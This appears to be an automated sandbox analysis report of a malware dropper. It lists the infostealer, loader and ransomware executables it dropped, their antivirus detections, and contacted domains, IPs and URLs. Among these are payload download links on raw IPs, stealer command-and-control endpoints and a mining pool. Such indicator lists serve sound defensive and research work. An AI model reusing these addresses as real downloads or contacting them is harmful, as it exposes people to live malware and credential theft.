C:\Program Files (x86)\NetVoyager\nv.exe	100%	Avira	TR/Redcap.turvo
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\armadegon[1].exe	100%	Joe Sandbox ML
C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66b623c3b1dcb_Mowdiewart[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe	100%	Joe Sandbox ML
C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\NetVoyager\nv.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\NetVoyager\nv.exe	83%	ReversingLabs	Win32.Trojan.Privateloader
C:\ProgramData\DHDAFBFCFHID\freebl3.dll	0%	ReversingLabs
C:\ProgramData\DHDAFBFCFHID\mozglue.dll	0%	ReversingLabs
C:\ProgramData\DHDAFBFCFHID\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\DHDAFBFCFHID\nss3.dll	0%	ReversingLabs
C:\ProgramData\DHDAFBFCFHID\softokn3.dll	0%	ReversingLabs
C:\ProgramData\DHDAFBFCFHID\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	67%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66ae9cc050ded_file0308[1].exe	87%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66b623c3b1dcb_Mowdiewart[1].exe	83%	ReversingLabs	Win32.Ransomware.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\armadegon[1].exe	75%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66b24859611ad_agent_3[1].exe	83%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5b75106ac6_stealc[1].exe	38%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66b5d9d3adbaa_defaultr[1].exe	62%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b45c742e0a1_123p[1].exe	67%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66b5ac1092454_otraba[1].exe	21%	ReversingLabs	ByteCode-MSIL.Trojan.RemLoader
C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	38%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	21%	ReversingLabs	ByteCode-MSIL.Trojan.RemLoader
C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	87%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	62%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	83%	ReversingLabs	Win32.Ransomware.RedLine
C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	75%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	67%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	83%	ReversingLabs	Win32.Trojan.Privateloader
C:\Windows\Temp\yqyegvqciyid.sys	5%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
celebratioopz.shop	4%	Virustotal	Browse
agent-runner-service2.com	1%	Virustotal	Browse
yip.su	7%	Virustotal	Browse
helsinki-dtc.com	1%	Virustotal	Browse
cdn.discordapp.com	1%	Virustotal	Browse
pool.hashvault.pro	5%	Virustotal	Browse
arpdabl.zapto.org	13%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
complaintsipzzx.shop	3%	Virustotal	Browse
vk.com	0%	Virustotal	Browse
api.myip.com	0%	Virustotal	Browse
ipinfo.io	0%	Virustotal	Browse
service-domain.xyz	12%	Virustotal	Browse
enfixxysdjsip.shop	2%	Virustotal	Browse
api.2ip.ua	6%	Virustotal	Browse
writerospzm.shop	3%	Virustotal	Browse
quialitsuzoxm.shop	3%	Virustotal	Browse
helleaa.com	16%	Virustotal	Browse
d1u0l9f6kr1di3.cloudfront.net	0%	Virustotal	Browse
mennyudosirso.shop	3%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
tenntysjuxmz.shop	24%	Virustotal	Browse
bassizcellskz.shop	3%	Virustotal	Browse
env-3936544.jcloud.kz	6%	Virustotal	Browse
googlehosted.l.googleusercontent.com	0%	Virustotal	Browse
skrptfiles.tracemonitors.com	1%	Virustotal	Browse
deallerospfosu.shop	3%	Virustotal	Browse
clients2.googleusercontent.com	0%	Virustotal	Browse
www.rapidfilestorage.com	1%	Virustotal	Browse
languagedscie.shop	3%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://www.mozilla.com/en-US/blocklist/	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.openssl.org/support/faq.html	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc	0%	Avira URL Cloud	safe
https://quialitsuzoxm.shop/api	0%	Avira URL Cloud	safe
https://cdn.discordapp.com/4	0%	Avira URL Cloud	safe
https://st6-21.vk.com/css/al/common.871c328a.css	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr6	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr#	100%	Avira URL Cloud	malware
https://cdn.discordapp.com/attachmtachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr6	22%	Virustotal		Browse
https://cdn.discordapp.com/4	0%	Virustotal		Browse
https://papi.vk.com/pushsse/ruim	0%	Avira URL Cloud	safe
https://telegram.org	0%	Avira URL Cloud	safe
https://quialitsuzoxm.shop/api	14%	Virustotal		Browse
https://helleaa.com/temp/random.exe)	100%	Avira URL Cloud	phishing
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr#	22%	Virustotal		Browse
https://papi.vk.com/pushsse/ruim	0%	Virustotal		Browse
https://telegram.org	0%	Virustotal		Browse
https://celebratioopz.shop/api	100%	Avira URL Cloud	malware
https://languagedscie.shop/api	0%	Avira URL Cloud	safe
api.garageserviceoperation.com/CoreOPT/index.php	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66b623c3b1dcb_Mowdiewart.exe?	100%	Avira URL Cloud	malware
https://languagedscie.shop/api	13%	Virustotal		Browse
https://celebratioopz.shop/api	15%	Virustotal		Browse
https://vk.com	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66b5ac1092454_otraba.exe#otrb24859611ad_agent_3.exe	100%	Avira URL Cloud	phishing
https://ipinfo.io:443/widget/demo/8.46.123.33O	0%	Avira URL Cloud	safe
https://www.instagram.com	0%	Avira URL Cloud	safe
https://vk.com	0%	Virustotal		Browse
45.9.91.71:46967	0%	Avira URL Cloud	safe
api.garageserviceoperation.com/CoreOPT/index.php	1%	Virustotal		Browse
https://analytics.tiktok.com	0%	Avira URL Cloud	safe
https://www.instagram.com	0%	Virustotal		Browse
45.9.91.71:46967	0%	Virustotal		Browse
http://147.45.44.104/prog/66b24859611ad_agent_3.exemu	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66b5ac1092454_otraba.exe#otrb24859611ad_agent_3.exe	22%	Virustotal		Browse
https://analytics.tiktok.com	0%	Virustotal		Browse
https://yastatic.net	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66b623c3b1dcb_Mowdiewart.exe.	100%	Avira URL Cloud	malware
https://st6-21.vk.com/css/al/base.3e47d375.css	0%	Avira URL Cloud	safe
https://mennyudosirso.shop/api	100%	Avira URL Cloud	malware
https://helleaa.com/temp/random.exe	100%	Avira URL Cloud	malware
https://api.vk.com	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr	100%	Avira URL Cloud	malware
https://yastatic.net	0%	Virustotal		Browse
https://st6-21.vk.com/css/al/base.3e47d375.css	0%	Virustotal		Browse
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr	22%	Virustotal		Browse
https://api.vk.com	0%	Virustotal		Browse
http://helsinki-dtc.com/updates/yd/yt_wrtzr_1/win/version.txt?TCtDuRUdKYZTtiynHOebqmOBgoFjjnvzy	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66b24859611ad_agent_3.exedu	0%	Avira URL Cloud	safe
https://ton.twimg.com	0%	Avira URL Cloud	safe
http://185.215.113.16/inc/armadegon.exe=	100%	Avira URL Cloud	phishing
https://steamcommunity.com/profiles/76561199751190313	0%	Avira URL Cloud	safe
https://mennyudosirso.shop/api	15%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199724331900	100%	Avira URL Cloud	malware
http://147.45.47.59/d6f30af05ffe50bf.php	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199751190313	1%	Virustotal		Browse
http://147.45.44.104/prog/66b5b75106ac6_stealc.exe#spaceet	100%	Avira URL Cloud	phishing
https://steamcommunity.com/profiles/76561199724331900	8%	Virustotal		Browse
http://147.45.47.59/d6f30af05ffe50bf.php	0%	Virustotal		Browse
http://147.45.44.104/prog/66b45c742e0a1_123p.exea	0%	Avira URL Cloud	safe
https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn	0%	Avira URL Cloud	safe
http://194.58.114.223/d/525403	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66b5b75106ac6_stealc.exe#spaceet	23%	Virustotal		Browse
http://147.45.44.104/prog/66b24859611ad_agent_3.exe$so	0%	Avira URL Cloud	safe
https://ipinfo.io/N	0%	Avira URL Cloud	safe
http://194.58.114.223/d/525403	13%	Virustotal		Browse
https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn	0%	Virustotal		Browse
https://stats.vk-portal.net	0%	Avira URL Cloud	safe
https://vk.com/browser_reports?dest=default_reports	0%	Avira URL Cloud	safe
https://ton.twimg.com	0%	Virustotal		Browse
https://tagmanager.google.com	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66b45c742e0a1_123p.exeJ	0%	Avira URL Cloud	safe
https://ipinfo.io/7	0%	Avira URL Cloud	safe
https://helleaa.com/temp/random.exe	8%	Virustotal		Browse
https://s.ytimg.com	0%	Avira URL Cloud	safe
https://r.mradx.net	0%	Avira URL Cloud	safe
http://194.58.114.223/d/525403ty	0%	Avira URL Cloud	safe
https://t.me/pech0nk	0%	Avira URL Cloud	safe
https://st6-21.vk.com/css/al/fonts_utf.7fa94ada.css	0%	Avira URL Cloud	safe
http://skrptfiles.tracemonitors.com/updates/yd/yt_wrtzr_1/win/version.txt?rwPMUQxcTIPiQpiDrtjTaQVThGnaNHXkE	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
celebratioopz.shop	104.21.47.141	true	true	4%, Virustotal, Browse	unknown
agent-runner-service2.com	95.164.44.107	true	false	1%, Virustotal, Browse	unknown
yip.su	188.114.97.3	true	false	7%, Virustotal, Browse	unknown
helsinki-dtc.com	194.67.87.38	true	false	1%, Virustotal, Browse	unknown
arpdabl.zapto.org	38.180.132.96	true	false	13%, Virustotal, Browse	unknown
cdn.discordapp.com	162.159.130.233	true	false	1%, Virustotal, Browse	unknown
pool.hashvault.pro	45.76.89.70	true	false	5%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
api.myip.com	104.26.8.59	true	false	0%, Virustotal, Browse	unknown
ipinfo.io	34.117.59.81	true	false	0%, Virustotal, Browse	unknown
complaintsipzzx.shop	104.21.14.101	true	true	3%, Virustotal, Browse	unknown
api.2ip.ua	188.114.96.3	true	false	6%, Virustotal, Browse	unknown
service-domain.xyz	54.210.117.250	true	true	12%, Virustotal, Browse	unknown
vk.com	87.240.132.78	true	false	0%, Virustotal, Browse	unknown
quialitsuzoxm.shop	188.114.97.3	true	true	3%, Virustotal, Browse	unknown
enfixxysdjsip.shop	104.21.76.141	true	true	2%, Virustotal, Browse	unknown
writerospzm.shop	104.21.16.74	true	true	3%, Virustotal, Browse	unknown
env-3936544.jcloud.kz	185.22.66.16	true	false	6%, Virustotal, Browse	unknown
d1u0l9f6kr1di3.cloudfront.net	13.32.145.29	true	false	0%, Virustotal, Browse	unknown
mennyudosirso.shop	104.21.73.43	true	true	3%, Virustotal, Browse	unknown
deallerospfosu.shop	104.21.69.39	true	true	3%, Virustotal, Browse	unknown
languagedscie.shop	188.114.97.3	true	true	3%, Virustotal, Browse	unknown
helleaa.com	162.0.209.124	true	false	16%, Virustotal, Browse	unknown
steamcommunity.com	92.122.104.90	true	true	0%, Virustotal, Browse	unknown
bassizcellskz.shop	188.114.96.3	true	true	3%, Virustotal, Browse	unknown
tenntysjuxmz.shop	188.114.96.3	true	false	24%, Virustotal, Browse	unknown
googlehosted.l.googleusercontent.com	142.250.185.193	true	false	0%, Virustotal, Browse	unknown
clients2.googleusercontent.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.rapidfilestorage.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
skrptfiles.tracemonitors.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://quialitsuzoxm.shop/api	false	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://celebratioopz.shop/api	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://languagedscie.shop/api	false	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
api.garageserviceoperation.com/CoreOPT/index.php	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
45.9.91.71:46967	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mennyudosirso.shop/api	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://helleaa.com/temp/random.exe	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://helsinki-dtc.com/updates/yd/yt_wrtzr_1/win/version.txt?TCtDuRUdKYZTtiynHOebqmOBgoFjjnvzy	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199751190313	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199724331900	false	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://147.45.47.59/d6f30af05ffe50bf.php	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://194.58.114.223/d/525403	false	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://skrptfiles.tracemonitors.com/updates/yd/yt_wrtzr_1/win/version.txt?rwPMUQxcTIPiQpiDrtjTaQVThGnaNHXkE	false	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde&	false	Avira URL Cloud: safe	unknown
https://bassizcellskz.shop/api	false	Avira URL Cloud: safe	unknown
https://complaintsipzzx.shop/api	false	Avira URL Cloud: malware	unknown
https://vk.com/doc869877400_679230593?hash=JDs0Rq6RGgLMWXUFzWMB8cYHTybh6lXFwxmcZ1ZeK2w&dl=uMxA8hZLVNzU3FtB3MumkHq06odvtZCiVngKoCNbdNz&api=1&no_preview=1#launc	false	Avira URL Cloud: safe	unknown
http://www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?KubbvdjJfOkOrksIlOLwwrZZFcTPifwjk	false	Avira URL Cloud: malware	unknown
http://arpdabl.zapto.org/	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b5ac1092454_otraba.exe#otr	false	Avira URL Cloud: phishing	unknown
https://yip.su/1cN8u7	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr6	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906431495.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911146573.0000013415BD2000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915454980.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://st6-21.vk.com/css/al/common.871c328a.css	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/4	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906431495.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906388767.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.0000013416167000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66ae9cc050ded_file0308.exe#fileotr#	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906431495.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911146573.0000013415BD2000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915454980.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachmtachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://papi.vk.com/pushsse/ruim	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://telegram.org	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://helleaa.com/temp/random.exe)	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://147.45.44.104/prog/66b623c3b1dcb_Mowdiewart.exe?	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906261672.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sajatypeworks.com	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://vk.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b5ac1092454_otraba.exe#otrb24859611ad_agent_3.exe	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.founder.com.cn/cn/cThe	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io:443/widget/demo/8.46.123.33O	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1838462230.0000013414150000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://analytics.tiktok.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b24859611ad_agent_3.exemu	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922349963.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910883394.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906388767.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911269649.0000013415B74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yastatic.net	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b623c3b1dcb_Mowdiewart.exe.	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906431495.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
